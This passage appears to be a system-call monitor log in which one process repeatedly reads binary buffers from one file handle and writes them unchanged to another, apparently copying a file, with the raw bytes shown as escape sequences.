\x1e\xdc-\x8bv\x06\x0b\x87Phn\x1c6\xd7\x86\x83Z\xc8\xe2\xc4\xc7\x0f\xa7\x0ej\xc3\xe2-\xd8\xd9D=\xeb?W\x16\xddb\x18\xf0\x80f\x05\x00\x95\x1c\x01\x8a\xaf\x99\xb0K\xcf\x88\x06d\x84\xa1|\xb9\x88\xb5h\x1d$\x85\xd1e\xe8P\x93\xc8\x04yP\xa1\xb3$
x\xfe
P\x1f5\x0b\xb5<g,\x14c\xfe;7{\x13\xf2)\xfc\xfcl0\x12\xfef\xcf\xd9<-\xfc
\x1e\x17=\xfcY'\xdb\x16\x86I4\xff\xd7\xe4\xe0\xfe\xbaX8\xf2\x08\x16\x17\xce7\x04YH\x06\x8d\x8c<Zb\xd6\xb6\xad\xeb\x88\xb0\x84\xa9\xcdn\xf1\xeaey\x98\xf9!\x06F>\xcc\xa6\x1a\xaa\xf8,\x84\x8c2\xcc\x06\xc4.\x95\x1c\x14\xf7\xf6*>\xf5\xee\xbb\x8fbt'A;\xca|\xf4\x0bh\x83\xc0
`\xa4\xf8h-\x0c\x0c\xe7\xf4&d\xa8\x7f5R@ FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,768 | 364 | NtWriteFile |
Buffer => \x1fw\x016\xd1='\x7f\x12
\x8d\x8d\xb5\xa5`\xe0\xbe2\xcb\xd5(\xe2\xc1\xa2nG\xec\x8c\xb3\x82\x18b\xf0\x93\x86V
\x1e\xdc-\x8bv\x06\x0b\x87Phn\x1c6\xd7\x86\x83Z\xc8\xe2\xc4\xc7\x0f\xa7\x0ej\xc3\xe2-\xd8\xd9D=\xeb?W\x16\xddb\x18\xf0\x80f\x05\x00\x95\x1c\x01\x8a\xaf\x99\xb0K\xcf\x88\x06d\x84\xa1|\xb9\x88\xb5h\x1d$\x85\xd1e\xe8P\x93\xc8\x04yP\xa1\xb3$
x\xfe
P\x1f5\x0b\xb5<g,\x14c\xfe;7{\x13\xf2)\xfc\xfcl0\x12\xfef\xcf\xd9<-\xfc
\x1e\x17=\xfcY'\xdb\x16\x86I4\xff\xd7\xe4\xe0\xfe\xbaX8\xf2\x08\x16\x17\xce7\x04YH\x06\x8d\x8c<Zb\xd6\xb6\xad\xeb\x88\xb0\x84\xa9\xcdn\xf1\xeaey\x98\xf9!\x06F>\xcc\xa6\x1a\xaa\xf8,\x84\x8c2\xcc\x06\xc4.\x95\x1c\x14\xf7\xf6*>\xf5\xee\xbb\x8fbt'A;\xca|\xf4\x0bh\x83\xc0
`\xa4\xf8h-\x0c\x0c\xe7\xf4&d\xa8\x7f5R@ FileHandle => 0x000001a0 |
SUCCESS | 0x00000000 | |
| 07:44:02,768 | 364 | NtReadFile |
Buffer => \xca \x8a\x19\x88\x18@A{\xf7G2]`k+[\x01\xf2\x8b_\x04\x97\xa2\xd19Otu\xaf\x99\x0f\x8eT\xfav\x88tv|M\x0cP\x80~,\xd4hc\xe4\xb4H\xec\xfaL3\x18l_a^\xfd[\xcc\x08p\x9b\xd9\x88\xd3}8\xd6\xc4]j\xfb\x0b\x8d\x8d_\x01O\xf8\x8d\x1e\xff-\xbcu]5\xb3\x15\x85P\xcf~\x13\x04D\x96\x1c\x17*\xaf\x94\x10\x17\xd9\xccI]\xa8\x117\x9f\x7f\xed\xb9\x12}#\xbe\x11\xcf\xbe\x19\x140\x80\xba\x18\x16@Y|\xed\xeb\x0e\xb7\x1a5\xe9\x141b\xb7\xc8|r+\xfc\xff\xee\x8dQ\x03;\xd0}e;\xcf}a;\xc1WO\\x06\xbf\xb56\xd8\xbb!H\x12O\xd8\xf8;\xc2~C\xb5\xe2M\xfc;\xc7~?+\xc1\x0c\xff\x07|6Km\xb1\xd1/\x16\x03\xce;\xd7}\xac\x01\x8f\x15\xd1\x10|S\x11BA\x81\xfa\xfeR\xe9\x1eH\xf5Z\xf7\x1076;[\xe6\xc2\x97\xcb\x8b\xfb;}\x0c\x8c1\x89\x8b6u\x12m FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,768 | 364 | NtWriteFile |
Buffer => \xca \x8a\x19\x88\x18@A{\xf7G2]`k+[\x01\xf2\x8b_\x04\x97\xa2\xd19Otu\xaf\x99\x0f\x8eT\xfav\x88tv|M\x0cP\x80~,\xd4hc\xe4\xb4H\xec\xfaL3\x18l_a^\xfd[\xcc\x08p\x9b\xd9\x88\xd3}8\xd6\xc4]j\xfb\x0b\x8d\x8d_\x01O\xf8\x8d\x1e\xff-\xbcu]5\xb3\x15\x85P\xcf~\x13\x04D\x96\x1c\x17*\xaf\x94\x10\x17\xd9\xccI]\xa8\x117\x9f\x7f\xed\xb9\x12}#\xbe\x11\xcf\xbe\x19\x140\x80\xba\x18\x16@Y|\xed\xeb\x0e\xb7\x1a5\xe9\x141b\xb7\xc8|r+\xfc\xff\xee\x8dQ\x03;\xd0}e;\xcf}a;\xc1WO\\x06\xbf\xb56\xd8\xbb!H\x12O\xd8\xf8;\xc2~C\xb5\xe2M\xfc;\xc7~?+\xc1\x0c\xff\x07|6Km\xb1\xd1/\x16\x03\xce;\xd7}\xac\x01\x8f\x15\xd1\x10|S\x11BA\x81\xfa\xfeR\xe9\x1eH\xf5Z\xf7\x1076;[\xe6\xc2\x97\xcb\x8b\xfb;}\x0c\x8c1\x89\x8b6u\x12m FileHandle => 0x000001a0 |
SUCCESS | 0x00000000 | |
| 07:44:02,768 | 364 | NtReadFile |
Buffer => \xbc\x0e\x02u \x8f_\xa0\x12cp\xea\\x9eeWN\xd8\\xb0\x8b\xef;\xfe\xa9>\x12s\xc0\x0c\xe5\xdcNY95\xe5)\xb8\x83\x96\x8b\x1d\x84\x86\xe4\xa3\xdf\xb3\x85Wp\xd3 \x8d\xbd\x05PO\xd5\x05\xb3\x16?\x80<8\\xf9\x19<;\x10g\x0e\x15]\x11x\x18\xc9r\x8c\x93h@k\xa4\xfdV}\xb6\x95*\xfb\x92\xfc\x15Pu#\x00\x91\xa7\xe05\xd90\xe0X1\xbbzu\x03#O\xeb\x11\x1f\xce\x8a\x8f\x98$k\xac\xd7\xbd\xd0\xe7f\xdbp<;\x1b\x08\xd1\x00t\xae\xcc0\xb2|\x11 \xd2\x9c\x0fZ\xbeQ6\xd9\xc5P\xbeTP\xb7\x88}\xc9+\x13\xf6\xa5\xcc j
\xbb\xc0\x84K(\x89\x0cH"A\xd8QvVB\xa9JCH'X\xe1\x17\xb1\xb5\xd4P-Yy\x19\xf8\xf8\xa0\xb1\xbc\x1cN[u\xca\x03N\x19F\x9b\xb4\x18\xaf
\xa6i\x9a^g\xe5Loc\x82\xa6i\x9aal Se\x96eY\x96\xf0tting,[AYs FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,768 | 364 | NtWriteFile |
Buffer => \xbc\x0e\x02u \x8f_\xa0\x12cp\xea\\x9eeWN\xd8\\xb0\x8b\xef;\xfe\xa9>\x12s\xc0\x0c\xe5\xdcNY95\xe5)\xb8\x83\x96\x8b\x1d\x84\x86\xe4\xa3\xdf\xb3\x85Wp\xd3 \x8d\xbd\x05PO\xd5\x05\xb3\x16?\x80<8\\xf9\x19<;\x10g\x0e\x15]\x11x\x18\xc9r\x8c\x93h@k\xa4\xfdV}\xb6\x95*\xfb\x92\xfc\x15Pu#\x00\x91\xa7\xe05\xd90\xe0X1\xbbzu\x03#O\xeb\x11\x1f\xce\x8a\x8f\x98$k\xac\xd7\xbd\xd0\xe7f\xdbp<;\x1b\x08\xd1\x00t\xae\xcc0\xb2|\x11 \xd2\x9c\x0fZ\xbeQ6\xd9\xc5P\xbeTP\xb7\x88}\xc9+\x13\xf6\xa5\xcc j
\xbb\xc0\x84K(\x89\x0cH"A\xd8QvVB\xa9JCH'X\xe1\x17\xb1\xb5\xd4P-Yy\x19\xf8\xf8\xa0\xb1\xbc\x1cN[u\xca\x03N\x19F\x9b\xb4\x18\xaf
\xa6i\x9a^g\xe5Loc\x82\xa6i\x9aal Se\x96eY\x96\xf0tting,[AYs FileHandle => 0x000001a0 |
SUCCESS | 0x00000000 | |
| 07:44:02,778 | 364 | NtReadFile |
Buffer => \x07\xde+X]N\xb6\xe7\xb3\xe0\x01\xe2\x01\xeck\xe4\xd8\x88\xd1\x9b\x15\x92\xa8\x04!\x88<gt?*\xc6^\xa7,8\xc5:3M\x01@\xaf\x9ae\x88P\xbcGE\x89K\xc5\x12c\xd8\xf1\xbb\x08\x9dl\x05]\x80\xc7;\xdd\xc5\xff\x93\xc9\xa2\x1f\x08\x07w?\xff$\x95\xd9[\xe7\xef\x86M\xfa\xe8&D6h\xd8\x06/h\xc8\xe7\xe7\xe7\xe7(h\xb8!h\xa4\x1ah\x94\x13hp\x15\xb3\xe6\xe7\x0chX\x05hHWy\x97E\xbcc\x10hD\x11\x90\x03v\xa9K<\xea.\x11J6h<=\x8c}vr, +hh\x18\x07\x8dV\xf1\xac\x10\x90\x06\x81\xc3\xa6;\x98t/YS\x1c\xdbK\xd0(\x99\xe2\x05\x01a\x8e\x14o\x15\xa4]\x18\x01~$\xdd\xb7\x82\x91Z\xde;\xcat\x08$A\xa2M\xd65\xf4\x03Y\x94\x05@7\xd9\x7f\x84'\x03\x85\xd2\x89U\xfc~\x1a\x19\x1a\x17\x0f\x7f\x03\xfe\x80\xc2a\x88\x147\xad\xfc|\xe6\xc6\x84\x1eG@\xb3I\x14\xdc\xbe FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,778 | 364 | NtWriteFile |
Buffer => \x07\xde+X]N\xb6\xe7\xb3\xe0\x01\xe2\x01\xeck\xe4\xd8\x88\xd1\x9b\x15\x92\xa8\x04!\x88<gt?*\xc6^\xa7,8\xc5:3M\x01@\xaf\x9ae\x88P\xbcGE\x89K\xc5\x12c\xd8\xf1\xbb\x08\x9dl\x05]\x80\xc7;\xdd\xc5\xff\x93\xc9\xa2\x1f\x08\x07w?\xff$\x95\xd9[\xe7\xef\x86M\xfa\xe8&D6h\xd8\x06/h\xc8\xe7\xe7\xe7\xe7(h\xb8!h\xa4\x1ah\x94\x13hp\x15\xb3\xe6\xe7\x0chX\x05hHWy\x97E\xbcc\x10hD\x11\x90\x03v\xa9K<\xea.\x11J6h<=\x8c}vr, +hh\x18\x07\x8dV\xf1\xac\x10\x90\x06\x81\xc3\xa6;\x98t/YS\x1c\xdbK\xd0(\x99\xe2\x05\x01a\x8e\x14o\x15\xa4]\x18\x01~$\xdd\xb7\x82\x91Z\xde;\xcat\x08$A\xa2M\xd65\xf4\x03Y\x94\x05@7\xd9\x7f\x84'\x03\x85\xd2\x89U\xfc~\x1a\x19\x1a\x17\x0f\x7f\x03\xfe\x80\xc2a\x88\x147\xad\xfc|\xe6\xc6\x84\x1eG@\xb3I\x14\xdc\xbe FileHandle => 0x000001a0 |
SUCCESS | 0x00000000 | |
| 07:44:02,778 | 364 | NtReadFile |
Buffer => \xfb\x19\xac\x15(
h$\x0e 8!\xd8\xc0\x94\x08\xfcP\x07;\xd0K\x84G\xe2\x82\x10\x0f\x85\xc2\x84\x19\x8f \xd7\x84/C8\xacWb2T\xa6\x0cG`\x98Q\xfe\\x91\xde\x11l\xca\x02 sPH~$\xe3A\x182\xf0\xfd\xc6f\x07^^\x13\x96&S\xa0\xc9h\xcb\x97\xf3<h\x90X\xd2\x9d\xccPh\x11GA\x1ac\xfe\xafW\xea\xd7
4F3O\xdaS\xba\xa2\x018+\xaa\xc7\x048\x88\xbe;\xba\xa63\x94\x9e\xb0\x06\xea }\xe8I\xc7'\x89\x03\xec\x81;\xaf}\x0ejC\x85\xb3\xdf\xaav\x1e\xeb\x0eP\xb0\xc3\x16\x8c\x13\x11\x07\x82\xd6\x00n\xe2%l\x80&\x00\x1eT\xb7\xff\x02\xf0f\x7f`\xde\xe8Dt9HHt-\x08\x0et\x81\xb0@\xb4\x1c\x04\xd0\xb4\x1f\xea\x02\x9f\xc1
\xcf0\xeb%'\x04Q!\xf4\xe9\x93/\xc3\x81\xc1\xa0\xeb\xef0\xad\xf9\xfdm&1\x88\x16\x80f\x01\x1f\x08\x02\xcfd\x9d\xeb\xe5\xedit\x1d\x04tt\x10wu FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,778 | 364 | NtWriteFile |
Buffer => \xfb\x19\xac\x15(
h$\x0e 8!\xd8\xc0\x94\x08\xfcP\x07;\xd0K\x84G\xe2\x82\x10\x0f\x85\xc2\x84\x19\x8f \xd7\x84/C8\xacWb2T\xa6\x0cG`\x98Q\xfe\\x91\xde\x11l\xca\x02 sPH~$\xe3A\x182\xf0\xfd\xc6f\x07^^\x13\x96&S\xa0\xc9h\xcb\x97\xf3<h\x90X\xd2\x9d\xccPh\x11GA\x1ac\xfe\xafW\xea\xd7
4F3O\xdaS\xba\xa2\x018+\xaa\xc7\x048\x88\xbe;\xba\xa63\x94\x9e\xb0\x06\xea }\xe8I\xc7'\x89\x03\xec\x81;\xaf}\x0ejC\x85\xb3\xdf\xaav\x1e\xeb\x0eP\xb0\xc3\x16\x8c\x13\x11\x07\x82\xd6\x00n\xe2%l\x80&\x00\x1eT\xb7\xff\x02\xf0f\x7f`\xde\xe8Dt9HHt-\x08\x0et\x81\xb0@\xb4\x1c\x04\xd0\xb4\x1f\xea\x02\x9f\xc1
\xcf0\xeb%'\x04Q!\xf4\xe9\x93/\xc3\x81\xc1\xa0\xeb\xef0\xad\xf9\xfdm&1\x88\x16\x80f\x01\x1f\x08\x02\xcfd\x9d\xeb\xe5\xedit\x1d\x04tt\x10wu FileHandle => 0x000001a0 |
SUCCESS | 0x00000000 | |
| 07:44:02,778 | 364 | NtReadFile |
Buffer => \xb6-\xacD\x103O_'\x1b\xf7\x80\x8e"\x9aYO\xed\xfcm\xba(\xe5x\x8b\xb8\xdbh\xf0)5U\xb3\x03\x92\xb1Y\xd3\xa2\xb7\xbd\xcd$W\x05\xf2\xb8\x98\x1dA\xb3\xef\xbdj\x1aTW
\xc9F\xaf\xfbAU\x14\x80\x8c"R\_pAL\xb9R\xdc_|\x05\xb9Qc\xd1\xb9\x84#V\x054Q\xe6&\xebvFh\xf8\xabWV\x18P
\x05\x1c\xe0a\xb4i3 H\xc8\xf7R\x15+\xe4\xf3\x0et\x83\x11\xf8\xc0\xc3SHE\xb9\xe1\xa2}\x9f\x1a\x01\xaf\x01~\x08E\x07\x0f\x8c
\xc2h$w\xc0\x8a\x1b\xd3@\xf8\x8f\x89\x9d\x0f\xff\xf1\xd4\xb2\xb1\xcaF\x9aF}\x06\x89\xb5Z 9x\x1b\xde \xfbs\xa1
n\xf8}D\xf8\x89\xbdD\xfaB\xec;s\xc0\x1f^Y\x0cA\x0b\x83|\x92\xdd
K\xf5M\xc3\x8d\xb5O\xf4\xa8\xc4\xb7\xab\xdd^us\x8b\xb1\xbf\x01?E\xb8\xf7\xe0\x02-m\x05\x9f#a#h\xad\x07\x0c\x13\x0c@w\xbb\xc1I\xf5\x15P FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,778 | 364 | NtWriteFile |
Buffer => \xb6-\xacD\x103O_'\x1b\xf7\x80\x8e"\x9aYO\xed\xfcm\xba(\xe5x\x8b\xb8\xdbh\xf0)5U\xb3\x03\x92\xb1Y\xd3\xa2\xb7\xbd\xcd$W\x05\xf2\xb8\x98\x1dA\xb3\xef\xbdj\x1aTW
\xc9F\xaf\xfbAU\x14\x80\x8c"R\_pAL\xb9R\xdc_|\x05\xb9Qc\xd1\xb9\x84#V\x054Q\xe6&\xebvFh\xf8\xabWV\x18P
\x05\x1c\xe0a\xb4i3 H\xc8\xf7R\x15+\xe4\xf3\x0et\x83\x11\xf8\xc0\xc3SHE\xb9\xe1\xa2}\x9f\x1a\x01\xaf\x01~\x08E\x07\x0f\x8c
\xc2h$w\xc0\x8a\x1b\xd3@\xf8\x8f\x89\x9d\x0f\xff\xf1\xd4\xb2\xb1\xcaF\x9aF}\x06\x89\xb5Z 9x\x1b\xde \xfbs\xa1
n\xf8}D\xf8\x89\xbdD\xfaB\xec;s\xc0\x1f^Y\x0cA\x0b\x83|\x92\xdd
K\xf5M\xc3\x8d\xb5O\xf4\xa8\xc4\xb7\xab\xdd^us\x8b\xb1\xbf\x01?E\xb8\xf7\xe0\x02-m\x05\x9f#a#h\xad\x07\x0c\x13\x0c@w\xbb\xc1I\xf5\x15P FileHandle => 0x000001a0 |
SUCCESS | 0x00000000 | |
| 07:44:02,778 | 364 | NtReadFile |
Buffer => y\xb6\x91<lZ<+\xc1E\x93\xf0\x8f1>\xbb\xd5\x1a`\xcd\xb7\x81\x0ed6TS4n\xadNs\x07\xbf\x8d6\xfa\x00\x92\xe7;D11L<\xb2\xcf\x9c=\xd5\x00,\xcd%4 \xb1\x91\xeeY\xe1\xb5\x00\x86\x8f\xaa"\x0b\x06\x1e[^=4\x8cj\x8b\xaae\xe3\xe3\xd0\xeb
\xd6\x1b\x9a
B\xc9ho\x99\xfb\xe7\xf8u\xec\x08\xecGQ\xe8\xdd\x06B\x11\xeb\xee;\xc2\x01\x00\x83\x07,D\x11\x0f\x01\x8f\xd3\x9b\xa1r\x90\xcf\x05\x13+\x06~\xd1\x89\xc8\x10g~F\x02I\xdeuE\xde\xa0*\x05h,*\xdf\x11\x0e\xd8\xfcj\x99|\x1fw}\x18\xda$`k\xd6>\x88\x13\x0e\x1e\xf7Y\xe0\x8c\xe8\x84\xaf\xfc\xaa\xc6\x948\x87QB\x91$\xfe\xd3\x85\x87O\xe9\xb8\xe4vP\x83\xd8*#\xdfgC\xc0\xdc\xae\xb0*h\xa8R\xa0-L\x9ac\x17\\xff\x985$\x17\xd0\x82\x06\xe9\x9f\xd6\x01\xb1\x80\xb33W\xd9\x1e\x07cH\xc9Ja\xf0\xf7A\x8c\xd8\x87\x07\x10 FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,778 | 364 | NtWriteFile |
Buffer => y\xb6\x91<lZ<+\xc1E\x93\xf0\x8f1>\xbb\xd5\x1a`\xcd\xb7\x81\x0ed6TS4n\xadNs\x07\xbf\x8d6\xfa\x00\x92\xe7;D11L<\xb2\xcf\x9c=\xd5\x00,\xcd%4 \xb1\x91\xeeY\xe1\xb5\x00\x86\x8f\xaa"\x0b\x06\x1e[^=4\x8cj\x8b\xaae\xe3\xe3\xd0\xeb
\xd6\x1b\x9a
B\xc9ho\x99\xfb\xe7\xf8u\xec\x08\xecGQ\xe8\xdd\x06B\x11\xeb\xee;\xc2\x01\x00\x83\x07,D\x11\x0f\x01\x8f\xd3\x9b\xa1r\x90\xcf\x05\x13+\x06~\xd1\x89\xc8\x10g~F\x02I\xdeuE\xde\xa0*\x05h,*\xdf\x11\x0e\xd8\xfcj\x99|\x1fw}\x18\xda$`k\xd6>\x88\x13\x0e\x1e\xf7Y\xe0\x8c\xe8\x84\xaf\xfc\xaa\xc6\x948\x87QB\x91$\xfe\xd3\x85\x87O\xe9\xb8\xe4vP\x83\xd8*#\xdfgC\xc0\xdc\xae\xb0*h\xa8R\xa0-L\x9ac\x17\\xff\x985$\x17\xd0\x82\x06\xe9\x9f\xd6\x01\xb1\x80\xb33W\xd9\x1e\x07cH\xc9Ja\xf0\xf7A\x8c\xd8\x87\x07\x10 FileHandle => 0x000001a0 |
SUCCESS | 0x00000000 | |
| 07:44:02,778 | 364 | NtReadFile |
Buffer => \xa2\xbf\x00\xb0\xd2_\x8b\xcf\xf7\xf1\xb8s\x11=
\x0fK\x00,\xb8\xe0Z\x84z\xda\xfc\xb7\x9c#<Y!\x05s\x07h\x80\xeb\xdc]\x13\xde\xac\8\xaePs\x0bX\x84\xbb\x0b9ht,% \x1agW\xf2y<s&$'25p\x89\x91\xfc&%\xdc%ip\xdc\x007\x1bTs\x06`5{\xf6\xd8u\x04g\xdehh;, \xd0\x19\x9b\xcc\x91\x1e.\xd76|P\x81\xfa\xc2
\x7fR&'\xe3\x9c\xf0\x84})\x0c\x83Ar*\x0b2>\xc9\xd9\x93\x1er\x17\x12\x14
\x0f\x83\xa8\x1a\xbaf(?\xc6G\xe9C\x1c\x1eB\xde\xdcY\x8a\x028h\xd8+<r\x13\xb7\xddvJseB\xd00\xebA?\x07\x03{x%7Hh\x98\xf7\xf76\x048c;\xbbl\xebAY?%\x94X\xf2R\x9c\xc0l\x903\x18\x034\x04\x02v\xa9\xdchHGWKP\x03%"\x0c;\x03\x18\x95\xbbE\xc0\xbe$%X\x110\xa4j\x19\xd5\x05\x03\xf9\xfd0+ FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,778 | 364 | NtWriteFile |
Buffer => \xa2\xbf\x00\xb0\xd2_\x8b\xcf\xf7\xf1\xb8s\x11=
\x0fK\x00,\xb8\xe0Z\x84z\xda\xfc\xb7\x9c#<Y!\x05s\x07h\x80\xeb\xdc]\x13\xde\xac\8\xaePs\x0bX\x84\xbb\x0b9ht,% \x1agW\xf2y<s&$'25p\x89\x91\xfc&%\xdc%ip\xdc\x007\x1bTs\x06`5{\xf6\xd8u\x04g\xdehh;, \xd0\x19\x9b\xcc\x91\x1e.\xd76|P\x81\xfa\xc2
\x7fR&'\xe3\x9c\xf0\x84})\x0c\x83Ar*\x0b2>\xc9\xd9\x93\x1er\x17\x12\x14
\x0f\x83\xa8\x1a\xbaf(?\xc6G\xe9C\x1c\x1eB\xde\xdcY\x8a\x028h\xd8+<r\x13\xb7\xddvJseB\xd00\xebA?\x07\x03{x%7Hh\x98\xf7\xf76\x048c;\xbbl\xebAY?%\x94X\xf2R\x9c\xc0l\x903\x18\x034\x04\x02v\xa9\xdchHGWKP\x03%"\x0c;\x03\x18\x95\xbbE\xc0\xbe$%X\x110\xa4j\x19\xd5\x05\x03\xf9\xfd0+ FileHandle => 0x000001a0 |
SUCCESS | 0x00000000 | |
| 07:44:02,778 | 364 | NtReadFile |
Buffer => \x94\xb5\xacU\xb7\xbe\x1b\x04D\xa8\xa2\xe8\xb9\xe2\xae\xbd\x98C\xc6\xcb
k\xcc\x03\xff\xff\xc3\xffx\xbb\xbe\xc0\xb70\xc6c \xdcN,My\xa4\xbc\x05\xab\xff\xe5\xe8\x8e\x9f
!
\xff\x9f\xff\xff\xfa\xb71\xfd\xfe\xff\x87?\xdai\xbbf\xe0\xab\xc4q\xae\x95D\\xc9Ex\x91\x95\x98\xa4\x8f\xfc\xff\xff\xd8\x9a\xa7\xb9=\xe3^$\x17\xed\x85\x05ch\xb5\xd6\xbek\x02\xe6b\xd5x\xe1\xd2\xf3\xff\xff\xff\xbd\x82\x18\x1a$\xd3\x8dM\xce<\xb5\xae\xbe\x90\x1c\xc5\xc4\x0e?\xe9.\xa1\xa7m\xbfU\x02@\xff\xff\xff\xff\xe2\xe0PI\x0f\xc3?\x12\xb6t\xb3{\xfc\xfa\x93\x96k\xd0\x92\xc7\xaaFMPWDHOUEJ\xff\xff\xff\xffQ\x8fu\x9c\xbeVGKNTA@CBBEC@DP/\xc4\x9aDDGF6n@$5\xff\xff\xff\xff\x1f\x9a\xb7\xb7\xa0\x08/5,5\x06C\x02./I"O%\xbe\xac\xfe\xa0\x125 \x0c\x14\xcc-e\xcd\xff\xbf\xfd FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,778 | 364 | NtWriteFile |
Buffer => \x94\xb5\xacU\xb7\xbe\x1b\x04D\xa8\xa2\xe8\xb9\xe2\xae\xbd\x98C\xc6\xcb
k\xcc\x03\xff\xff\xc3\xffx\xbb\xbe\xc0\xb70\xc6c \xdcN,My\xa4\xbc\x05\xab\xff\xe5\xe8\x8e\x9f
!
\xff\x9f\xff\xff\xfa\xb71\xfd\xfe\xff\x87?\xdai\xbbf\xe0\xab\xc4q\xae\x95D\\xc9Ex\x91\x95\x98\xa4\x8f\xfc\xff\xff\xd8\x9a\xa7\xb9=\xe3^$\x17\xed\x85\x05ch\xb5\xd6\xbek\x02\xe6b\xd5x\xe1\xd2\xf3\xff\xff\xff\xbd\x82\x18\x1a$\xd3\x8dM\xce<\xb5\xae\xbe\x90\x1c\xc5\xc4\x0e?\xe9.\xa1\xa7m\xbfU\x02@\xff\xff\xff\xff\xe2\xe0PI\x0f\xc3?\x12\xb6t\xb3{\xfc\xfa\x93\x96k\xd0\x92\xc7\xaaFMPWDHOUEJ\xff\xff\xff\xffQ\x8fu\x9c\xbeVGKNTA@CBBEC@DP/\xc4\x9aDDGF6n@$5\xff\xff\xff\xff\x1f\x9a\xb7\xb7\xa0\x08/5,5\x06C\x02./I"O%\xbe\xac\xfe\xa0\x125 \x0c\x14\xcc-e\xcd\xff\xbf\xfd FileHandle => 0x000001a0 |
SUCCESS | 0x00000000 | |
| 07:44:02,778 | 364 | NtReadFile |
Buffer => IMNG\x12\x97\xff\xf8\x17\xf1+\x18CzF=\xd8G\x7f\xb9.\xf5\xb6\xfd\xff\xff\xff\x81=W,&\x8e\xb9\xc8E\xd8\x02\xc2\xbaQ,\xe5\x1c\x1a\xf4*\xad\xd1\xb5A\x93\xa8~\x99\x8e<\xff\xbf\xfd/3\x10\xc2\xc1BN\xcc\xc2O\xe9f\x00\xf6\x9c,\xba<*\xca\x06{\x0c\x0f}\xdfX\xf8\xff\x89+z9\xe9\x11rrn\xd6\xd0\x81\x0c\x18\x01\xccB\xb6\x8aU\xff\xff\xff\xff7x\x16\xd5_Mxq?QQ.\xac.\x9a\xc1vM\xa8\xb6pz\x97<FW\xcf}\xd9\x02\xf2\xf4\xff\xff\xbf\xf0\xb3>\xed<\x86\x9f=\xcf\xbeG\xdb2\xf6\x96<Ew2r\xb7\x18*\x14i[+\xff\xdf\xfe\xffI\xffTW]w\xb7\x95\xb2\x02\xb5\xccUq-!V\<N\xcaP\xc2\x80E\xc8\x15\xc4\xff\xad\xff\xff\x99|\xac\xabs4~-@\x95ZRL\x18H+'oY\xa8\xdfI\xc9v\x02]\xe8\xff\xff\xff\xc2\x87Fz\xb2=g\xe0l\xf9\xf51\x9a\xb9` FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,778 | 364 | NtWriteFile |
Buffer => IMNG\x12\x97\xff\xf8\x17\xf1+\x18CzF=\xd8G\x7f\xb9.\xf5\xb6\xfd\xff\xff\xff\x81=W,&\x8e\xb9\xc8E\xd8\x02\xc2\xbaQ,\xe5\x1c\x1a\xf4*\xad\xd1\xb5A\x93\xa8~\x99\x8e<\xff\xbf\xfd/3\x10\xc2\xc1BN\xcc\xc2O\xe9f\x00\xf6\x9c,\xba<*\xca\x06{\x0c\x0f}\xdfX\xf8\xff\x89+z9\xe9\x11rrn\xd6\xd0\x81\x0c\x18\x01\xccB\xb6\x8aU\xff\xff\xff\xff7x\x16\xd5_Mxq?QQ.\xac.\x9a\xc1vM\xa8\xb6pz\x97<FW\xcf}\xd9\x02\xf2\xf4\xff\xff\xbf\xf0\xb3>\xed<\x86\x9f=\xcf\xbeG\xdb2\xf6\x96<Ew2r\xb7\x18*\x14i[+\xff\xdf\xfe\xffI\xffTW]w\xb7\x95\xb2\x02\xb5\xccUq-!V\<N\xcaP\xc2\x80E\xc8\x15\xc4\xff\xad\xff\xff\x99|\xac\xabs4~-@\x95ZRL\x18H+'oY\xa8\xdfI\xc9v\x02]\xe8\xff\xff\xff\xc2\x87Fz\xb2=g\xe0l\xf9\xf51\x9a\xb9` FileHandle => 0x000001a0 |
SUCCESS | 0x00000000 | |
| 07:44:02,778 | 364 | NtReadFile |
Buffer => ?/\xff\x1b\xfc\xff\xb1\x92%^?v\xfa?d\x18K\xd2]T\xeaV\xae\xbb>
<@\x07\x04\xbf\xd1\xff\xffz\xaf=\x9a\x02\xedF)\x85Hl\x1c\x9f\x9d\x1e_\xc3|\xb70P\x81\x95@\xff\x85\xff\xffM|~
\x86\xce>Q)\xd1\x1e@\xa2}/\xbd)\xda\xc4\x9c!\xabn\xaf\xc2x\xff\xd6\xff\xffm5K\xdb\xcd]\x93\xeeG+\xaf\x18I\x8dEM\x89I@tE\xbd&\xd1\xa7\xd6\xfa\xff\xff[\xb7?`\xbaT\x10s>\xdbQ\xbd\xc1\xe5D\xbc/\x07_\xdbl\x04\x01y\xed\xdf\xf8\xb7\xae\x97\x96p\xd1\x80L)n\xc9\x93\xc2/7W"\xce\xff\xff/\xf4\xce)S]7I\xf4Iqc\xba\xd8\xc5\xecq\xf7iTQ\xc0\x83\xb1cS\xff\xff\xff\xff\,\xf7\x13\x17\x04\xde\x95\x17s\x84\xa9\xd9(\xc2\x90\x01@\x18\xaff|\xfb\x1c\x81\xbf\x15\x9e\x12\x87\x04\x85\xff\xff\xff\xffB\x1co\xd6\x8a\x84.\x87'\x865\x896\x88 \x8a\xa43\xf8V\x8b3 FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,778 | 364 | NtWriteFile |
Buffer => ?/\xff\x1b\xfc\xff\xb1\x92%^?v\xfa?d\x18K\xd2]T\xeaV\xae\xbb>
<@\x07\x04\xbf\xd1\xff\xffz\xaf=\x9a\x02\xedF)\x85Hl\x1c\x9f\x9d\x1e_\xc3|\xb70P\x81\x95@\xff\x85\xff\xffM|~
